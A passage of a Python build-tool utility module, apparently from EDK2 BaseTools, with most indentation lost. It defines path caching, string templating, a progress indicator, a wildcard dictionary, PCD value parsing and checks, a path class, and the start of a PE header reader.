_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
## Get GUID value from given packages
#
# @param CName The CName of the GUID
#  @param PackageList     List of packages to look up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = list(P.Guids.keys())
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like the following:
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict; the
# "placeholder_name" is the key name of the dict. ${BEGIN} and ${END} may be
# omitted; in that case, the "placeholder_name" must not be a list and it is
# replaced only once.
#
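# A minimal usage sketch of the class below:
#   Tmpl = TemplateString("${BEGIN}${Name} = ${Value}\n${END}")
#   Tmpl.Replace({'Name': ['A', 'B'], 'Value': ['1', '2']})
#   # -> "A = 1\nB = 2\n"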
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = []
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return "".join(self.String)
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String.append( "".join(S.Instantiate(Dictionary) for S in SectionList))
else:
if isinstance(AppendString,list):
self.String.extend(AppendString)
else:
self.String.append(AppendString)
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
    # shared class state used to stop the progress thread (avoids a dead loop)
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress characters
# @param CloseMessage The string printed after progress characters
# @param ProgressChar The character used to indicate the progress
# @param Interval The interval in seconds between two progress characters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress character
#
# @param OpenMessage The string printed before progress characters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
            Progressor._ProgressThread.daemon = False
Progressor._ProgressThread.start()
## Stop printing progress character
#
# @param CloseMessage The string printed after progress characters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
        while not Progressor._StopFlag.is_set():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
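# Minimal usage sketch:
#   P = Progressor("Processing", "done")
#   P.Start()
#   ...            # long-running work; one ProgressChar is printed per Interval
#   P.Stop()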
## Dictionary using prioritized list as key
#
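# For example (illustrative):
#   d = tdict(True, 2)          # single-value mode, two key levels
#   d['COMMON', 'X64'] = 1
#   d['IA32', 'X64']            # -> 1, falls back to the 'COMMON' wildcard
#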
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', TAB_STAR, 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def AnalyzePcdExpression(Setting):
RanStr = ''.join(sample(string.ascii_letters + string.digits, 8))
Setting = Setting.replace('\\\\', RanStr).strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
for i, ch in enumerate(FieldList):
if RanStr in ch:
FieldList[i] = ch.replace(RanStr,'\\\\')
return FieldList
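# Example: '|' inside a quoted string does not split fields:
#   AnalyzePcdExpression('"a|b"|VOID*|10')
#   # -> ['"a|b"', 'VOID*', '10']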
def ParseFieldValue (Value):
def ParseDevPathValue (Value):
if '\\' in Value:
            Value = Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
out = out.decode()
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
if "{CODE(" in Value:
return Value, len(Value.split(","))
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) // 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
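# A couple of illustrative results:
#   ParseFieldValue('UINT16(0x1234)')   # -> (4660, 2)
#   ParseFieldValue('TRUE')             # -> (1, 1)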
## AnalyzeDscPcd
#
#  Analyze a DSC PCD value; a DSC carries no data type info, so this function
#  mirrors the functions (AnalyzePcdData) used to retrieve PCD values from the database:
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
#  The PCD value has to be located in such strings, and it might be an expression
#    containing the "|" operator, which can also appear inside string values.
#
#  @param Setting:  String containing the information described above, with "TokenSpace.PcdCName|" stripped
#  @param PcdType:  PCD type: feature, fixed, dynamic default, VPD, HII
#  @param DataType: The datum type of the PCD: VOID*, UINT, BOOL
#  @retval:
#    ValueList: A list containing the fields described above
#    IsValid:   True if the setting conforms to the EBNF above, otherwise False
# Index: The index where PcdValue is in ValueList
#
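#  For instance (illustrative), a fixed-at-build setting parses as:
#    AnalyzeDscPcd('0x1|UINT8', MODEL_PCD_FIXED_AT_BUILD)
#    # -> (['0x1', 'UINT8', ''], True, 0)
#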
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
#  Analyze the PCD value, datum type and token number.
#  Used to avoid split issues when the value string contains the "|" character.
#
#  @param[in] Setting:   A string containing value/datum type/token number information;
#
#  @retval   ValueList: A list containing value, datum type and token number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## Check the format of a PCD value against its datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
                or (Value.startswith('{') and Value.endswith('}')) or ((Value.startswith("L'") or Value.startswith("'")) and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
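# Illustrative checks (each returns a (bool, message) pair):
#   CheckPcdDatum('BOOLEAN', 'TRUE')    # -> (True, "")
#   CheckPcdDatum('UINT8', '0x1FF')     # -> (False, "Too large PCD value...")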
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
    # @retval 0     The two PathClass are the same
    # @retval -1    The first PathClass is less than the second PathClass
    # @retval 1     The first PathClass is bigger than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
    #   @param PeFile    File path of the PE image
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
        if self._ByteListToStr(ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
